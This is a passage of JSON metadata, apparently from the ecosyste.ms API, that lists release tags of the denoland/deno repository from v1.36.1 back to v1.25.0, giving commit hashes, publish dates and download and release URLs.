s/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH